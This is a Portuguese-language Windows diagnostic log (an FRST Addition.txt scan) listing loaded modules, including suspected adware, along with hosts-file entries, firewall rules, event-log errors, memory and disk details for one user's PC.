2016-02-05 22:42 - 2016-02-11 08:37 - 00125864 _____ () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter64.exe
2016-01-05 21:15 - 2015-12-11 00:07 - 00615032 _____ () C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe
2016-01-05 21:15 - 2015-12-11 00:07 - 00088184 _____ () C:\Program Files (x86)\360\Total Security\deepscan\qutmload.dll
2016-02-05 22:37 - 2016-02-04 14:57 - 02010624 _____ () C:\ProgramData\WindowsMsg\675D131108D4FD145B0BFBC68A3E018A.dll
2015-12-16 22:20 - 2015-12-11 01:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
2015-12-16 22:20 - 2015-12-11 01:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll
2016-02-11 10:34 - 2016-02-11 10:34 - 01458176 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_patcher\releases\0.0.0.50\deploy\RiotLauncher.dll
2015-11-02 14:17 - 2015-11-02 14:17 - 04885152 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.186\deploy\Adobe AIR\Versions\1.0\Resources\WebKit.dll
2015-11-02 14:17 - 2015-11-02 14:17 - 17414304 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.186\deploy\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll
2016-01-22 11:17 - 2016-01-22 13:44 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-22 11:17 - 2016-01-22 13:44 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2016-01-19 21:25 - 2016-01-19 14:06 - 16792256 _____ () C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\PepperFlash\20.0.0.286\pepflashplayer.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)

==================== EXE Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)

==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2009-07-14 00:34 - 2016-02-11 10:29 - 00001110 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

(Atualmente não há nenhuma correção automática para esta seção.)

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{2CD90DA4-F729-4BCE-9922-6196FDB45093}] => (Allow) C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe
FirewallRules: [{18756391-BC3F-416C-A010-049CDD907728}] => (Allow) C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe
FirewallRules: [{B2C4C8BA-D491-4E8A-9CE3-D567426A7709}] => (Allow) C:\Level Up\Elsword\data\x2.exe
FirewallRules: [{AA1F30F4-61AD-4BCF-BAEE-4A11B5D06450}] => (Allow) C:\Level Up\Elsword\data\x2.exe
FirewallRules: [{B8BDAB7E-7F8E-4F43-8F76-B958AD6F7347}] => (Allow) C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe
FirewallRules: [{A559DEEF-53EB-41CE-A351-4B4758BB9183}] => (Allow) C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe
FirewallRules: [TCP Query User{45723286-CEAA-4089-A8BB-EADF4593DADD}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{036A5353-1841-41FD-B027-B0A66BCA52F2}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{27E184CD-B51D-4003-B929-428D8BFED808}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe
FirewallRules: [{667132CF-88F8-48B0-B88F-8C6C92BA554A}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe
FirewallRules: [TCP Query User{56774337-CC8B-4DE7-A32E-A937B017863C}C:\program files (x86)\java\jre1.8.0_71\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_71\bin\javaw.exe
FirewallRules: [UDP Query User{37110AA9-1EE5-4CD3-A6B1-CD60BE6F2CE3}C:\program files (x86)\java\jre1.8.0_71\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_71\bin\javaw.exe
FirewallRules: [{684C827C-0887-4E05-8B87-CC3205166006}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
FirewallRules: [{FEB0B381-251E-40A3-83DC-82B925733EB6}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
FirewallRules: [{D1CB5A7C-CF4E-4B24-B7CC-DEBCCCFD8505}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe
FirewallRules: [{E4A177F7-B8D1-40F9-BF4F-E94115682869}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe

==================== Pontos de Restauração =========================

03-02-2016 22:11:26 Uniblue DriverScanner installation
05-02-2016 22:40:32 Uniblue DriverScanner installation
10-02-2016 11:38:51 Windows Update

==================== Dispositivos Apresentando Falhas No Gerenciador =============

==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (02/11/2016 11:09:23 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:46:13 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:42:31 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:40:30 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2147024865. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:40:30 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:36:14 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:28:37 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:23:53 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2147024865. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:23:53 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2147024865. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:23:53 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Erros de Sistema:
=============
Error: (02/11/2016 11:21:28 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Util Primary Color foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 5000 milissegundos: Reiniciar o serviço.

Error: (02/11/2016 11:14:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Update Primary Color foi finalizado inesperadamente. Isto aconteceu 2 vez(es). A seguinte ação corretiva será tomada em 5000 milissegundos: Reiniciar o serviço.

Error: (02/11/2016 11:14:18 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Update Primary Color foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 5000 milissegundos: Reiniciar o serviço.

Error: (02/11/2016 11:14:15 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço The Calendar Service foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (02/11/2016 11:13:43 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço NVIDIA Display Driver Service foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (02/11/2016 11:13:39 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço nci foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (02/11/2016 11:09:51 AM) (Source: WAS) (EventID: 5175) (User: )
Description: O adaptador de escuta que serve o protocolo 'net.pipe' foi desconectado inesperadamente.

Error: (02/11/2016 11:09:23 AM) (Source: DCOM) (EventID: 10010) (User: Maollo-PC)
Description: CortanaUI.AppXtpp90jhw9p0njjb85kvhxpppgrqfp117.mca

Error: (02/11/2016 10:46:13 AM) (Source: DCOM) (EventID: 10010) (User: Maollo-PC)
Description: CortanaUI.AppXtpp90jhw9p0njjb85kvhxpppgrqfp117.mca

Error: (02/11/2016 10:42:31 AM) (Source: DCOM) (EventID: 10010) (User: Maollo-PC)
Description: CortanaUI.AppXtpp90jhw9p0njjb85kvhxpppgrqfp117.mca

CodeIntegrity:
===================================
Date: 2016-02-11 10:21:10.940
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-10 21:06:46.382
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-01 16:32:28.564
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Overwolf\0.92.3.0\x64\OWExplorer.dll that did not meet the Store signing level requirements.

Date: 2016-01-28 17:49:53.224
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-22 10:54:24.431
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-16 14:26:44.401
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-16 13:09:25.755
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-08 16:59:38.272
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-08 11:37:54.019
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-07 07:22:39.805
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

==================== Informações da Memória ===========================

Processador: Pentium(R) Dual-Core CPU E5700 @ 3.00GHz
Percentagem de memória em uso: 57%
RAM física total: 4095.24 MB
RAM física disponível: 1748.73 MB
Virtual Total: 8191.24 MB
Virtual disponível: 5264.65 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:243.6 GB) (Free:140.79 GB) NTFS
Drive d: (DADOS) (Fixed) (Total:687.37 GB) (Free:503.92 GB) NTFS
Drive f: (Reservado pelo Sistema) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[sistema com componentes de inicialização (obtido através de drive)]

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 573DA60E)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=243.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
Partition 4: (Not Active) - (Size=687.4 GB) - (Type=07 NTFS)

==================== Fim de Addition.txt ============================

Signaler le contenu de ce document